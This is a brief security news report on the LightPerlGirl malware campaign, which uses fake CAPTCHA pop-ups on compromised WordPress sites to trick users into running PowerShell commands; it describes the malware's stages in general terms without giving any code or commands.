Cybersecurity experts have flagged a deceptive malware campaign that uses fake CAPTCHA pop-up windows to install a new threat dubbed LightPerlGirl. The attack tricks users into manually executing disguised PowerShell commands, making it harder for security tools to detect the intrusion.

Researchers at Todyl identified the threat after spotting unusual PowerShell activity on a partner’s compromised device. The campaign hijacks legitimate but previously breached WordPress sites to deliver a fake security check, mimicking trusted services like Cloudflare.

Instead of exploiting software vulnerabilities, the attackers rely on social engineering, prompting users to copy and run a command via the Windows Run dialog. This manual step helps the malware bypass traditional security barriers.

LightPerlGirl, named after a signature in its code (“Copyright (c) LightPerlGirl 2025”) and embedded Russian strings, operates in multiple stealthy stages. The initial script contacts a command-and-control server to fetch a secondary payload, which includes three core functions:

  • HelpIO: Attempts privilege escalation and disables antivirus detection by excluding the Temp folder from Windows Defender scans.
  • Urex: Ensures persistence by downloading a batch file and adding a startup shortcut.
  • ExWpL: Executes a fileless payload using .NET reflection—an advanced evasion method that avoids creating detectable files on disk.

This technique-heavy campaign shows how modern threats combine trusted interface mimicry with technical sophistication. The malware’s persistence mechanism ensures it stays active across reboots, maintaining covert access via its C2 infrastructure.

The attack underlines a broader shift in cyber threats—away from traditional exploits and toward manipulation of users through familiar interfaces, making them unwitting participants in compromising their systems.

Cybersecurity teams are urged to bolster endpoint protections and raise awareness around deceptive pop-ups, as attackers refine their methods to slip past even the most modern defense tools.

Stay ahead of emerging cybersecurity threats. For the latest insights and updates on cloud security, follow SOC News.

News Source: CybersecurityNews.com